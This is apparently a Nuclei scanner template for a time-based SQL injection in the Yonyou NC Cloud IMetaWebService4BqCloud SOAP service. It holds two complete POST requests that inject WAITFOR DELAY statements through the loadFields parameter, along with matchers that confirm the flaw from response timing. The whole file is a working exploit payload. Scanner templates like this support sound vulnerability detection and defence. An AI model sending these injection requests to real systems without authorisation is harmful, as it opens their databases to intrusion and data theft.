id: yongyouNC-Cloud-IMetaWebService4BqCloud-sql-time

info:
  name: 用友NC Cloud IMetaWebService4BqCloud SQL注入漏洞
  author: yongyouNC
  severity: high
  tags: sql injection

http:
  - raw:
      - |
        POST /uapws/service/uap.pubitf.ae.meta.IMetaWebService4BqCloud HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml;charset=UTF-8

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:imet="http://meta.ae.pubitf.uap/IMetaWebService4BqCloud">
          <soapenv:Header/>
          <soapenv:Body>
              <imet:loadFields>
                <!--type: string-->
                <imet:string>SmartModel^1';WAITFOR DELAY '0:0:4'--</imet:string>
              </imet:loadFields>
          </soapenv:Body>
        </soapenv:Envelope>
      - |
        POST /uapws/service/uap.pubitf.ae.meta.IMetaWebService4BqCloud HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml;charset=UTF-8

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:imet="http://meta.ae.pubitf.uap/IMetaWebService4BqCloud">
          <soapenv:Header/>
          <soapenv:Body>
              <imet:loadFields>
                <!--type: string-->
                <imet:string>SmartModel^1';WAITFOR DELAY '0:0:8'--</imet:string>
              </imet:loadFields>
          </soapenv:Body>
        </soapenv:Envelope>
    matchers:
      - type: dsl
        dsl:
          - 'duration_1>=4 && duration_1<=5'  
          - 'duration_2>=8 && duration_2<=9'
        condition: and